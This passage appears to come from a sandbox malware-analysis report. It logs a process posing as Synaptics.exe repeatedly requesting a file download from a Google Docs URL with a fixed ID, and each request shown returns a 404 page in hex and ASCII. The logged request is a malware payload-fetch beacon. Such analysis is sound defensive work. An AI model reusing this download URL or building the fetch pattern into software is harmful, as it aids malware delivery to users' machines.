                                                                                                                                                                                        2022-05-17 11:32:02 UTC756INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 62 6d 64 59 33 4e 43 36 5a 43 6f 65 76 41 4f 37 62 66 42 61 6c 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="bmdY3NC6ZCoevAO7bfBalQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:02 UTC757INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:02 UTC758INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        25192.168.2.349763142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:32 UTC75OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:32 UTC78INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:32 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-+ji4LieRLJP/nC07pk5yYw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:32 UTC79INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:32 UTC79INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 7a 52 5a 66 70 62 6c 48 64 42 71 64 4c 39 6d 6f 45 65 2f 66 33 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zRZfpblHdBqdL9moEe/f3g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:32 UTC80INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:32 UTC81INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        250192.168.2.350032142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:02 UTC754OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:02 UTC758INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:02 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-BLrbW03Ipu97saVChlvegQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:02 UTC759INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 36 48 75 31 44 57 75 46 39 6b 30 75 54 75 45 33 43 70 78 6a 76 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6Hu1DWuF9k0uTuE3Cpxjvg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:02 UTC761INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:02 UTC761INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        251192.168.2.350033142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:02 UTC758OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:02 UTC761INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:02 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-D0Ah0uL3vbpuOJSad0zKFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:02 UTC762INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:02 UTC762INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 6a 4f 34 66 39 7a 44 48 44 2f 62 58 77 75 62 62 38 6d 55 4e 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9jO4f9zDHD/bXwubb8mUNg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:02 UTC763INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:02 UTC764INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        252192.168.2.350036142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:02 UTC764OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:03 UTC764INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:02 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-yip1KkNZoyqiaaOMyD3esw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:03 UTC765INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 67 44 48 4e 4c 43 43 54 6c 5a 4f 47 66 6d 70 65 57 79 68 32 6b 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gDHNLCCTlZOGfmpeWyh2kA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:03 UTC767INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:03 UTC767INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        253192.168.2.350037142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:02 UTC764OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:03 UTC767INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:03 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-5ed/Mxv+70kjkgXfnIMNrg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:03 UTC769INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 62 4f 78 39 76 65 43 4a 55 34 68 42 65 4b 79 75 5a 58 6f 75 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
